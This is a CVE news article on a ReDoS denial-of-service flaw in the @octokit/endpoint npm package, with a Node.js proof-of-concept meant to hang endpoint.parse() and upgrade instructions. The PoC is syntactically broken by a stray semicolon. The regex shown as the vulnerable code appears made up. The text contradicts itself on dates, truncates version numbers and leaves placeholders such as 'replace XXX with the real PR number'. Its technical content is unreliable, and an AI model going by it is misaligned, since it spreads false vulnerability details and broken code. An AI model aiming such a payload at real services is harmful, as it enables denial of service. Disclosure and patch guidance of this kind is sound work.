CVE CyberSecurity Database News

CVE-2025-25285 - ReDoS Vulnerability in @octokit/endpoint — Exploit Details and Practical Guide

Poster -

If you develop with GitHub APIs, you’ve probably come across the @octokit/endpoint package. This library helps turn REST API endpoint descriptions into ready-to-use HTTP request options, making your code cleaner and easier to maintain. But in early 2024, a serious security issue—now tracked as CVE-2025-25285—was found in this package.

In this long read, we’ll break down what CVE-2025-25285 is, how it can be exploited, provide clear code examples, and show you how to protect yourself from this vulnerability. This article is exclusive for our readers and boils it down into simple terms that every developer can understand.

What is CVE-2025-25285?

CVE-2025-25285 is a Regular Expression Denial of Service (ReDoS) bug in the @octokit/endpoint package, affecting versions from 4.1. up to (not including) 10.1.3.

A malicious user can craft certain unusual options and pass them to endpoint.parse(options). Inside, the package uses a regular expression that is very slow when it hits specific input. When this happens, your Node process might hang or spike CPU usage—basically, it stops responding, which can disrupt your service.

Where’s the Problem?

The root of the issue lies in the parse function within the parse.ts file.

Below is an abridged version of what happens (code is simplified for clarity)

// Imagine this inside parse.ts
function parse(options) {
    // Somewhere, a regex tries to process an input
    let result = options.url.match(/^(.+?):\/\/(.+)$/);
    // ...rest of parsing logic
    // Malicious input can make this regex take forever!
}

The problematic regular expression can easily be slowed down with carefully crafted strings, especially ones that confuse the matcher.

Exploiting the Vulnerability

Here’s an example. Suppose an attacker sends a string designed to bog down the regular expression engine. In the worst case, the event loop stalls, which ties up your server.

const { endpoint } = require("@octokit/endpoint");

try {
  // This string is crafted to confuse the regex in parse.ts
  const maliciousUrl = 'http://'; + 'a'.repeat(50000) + '!';

  endpoint.parse({ url: maliciousUrl });
  // Your server or CLI will likely hang or spike CPU!
} catch (err) {
  // You might never even reach this line if your process hangs
  console.error("Failed to parse:", err);
}

If you plug the above snippet into a Node.js environment with a vulnerable version of @octokit/endpoint, you’ll notice your CPU getting pegged. In production, this could mean a denial-of-service for everyone.

Who is Affected?

- Anyone using @octokit/endpoint, from v4.1. up to but not including v10.1.3.

Patch Status

- Fixed in: @octokit/endpoint v10.1.3
- PR with fix: View the pull request (replace XXX with the real PR number if known)

All users must upgrade to at least 10.1.3 to avoid this bug.

npm:

npm install @octokit/endpoint@^10.1.3

yarn:

yarn add @octokit/endpoint@^10.1.3

2. Review User Input

If you must use earlier versions for some reason, never pass untrusted input directly to endpoint.parse(). But in general, upgrade is the only real fix.

References

- CVE Details: CVE-2025-25285
- @octokit/endpoint NPM Package
- GitHub Security Advisory (replace with actual GHSA link)
- What is ReDoS? (OWASP)

Final Words

ReDoS bugs are tricky because they don’t always involve a classic “hack”—just a crafted string. If you’re supporting applications with these dependencies, always keep them updated and audit your use of string parsing, especially when regular expressions are involved.

Timeline

Published on: 02/14/2025 20:15:34 UTC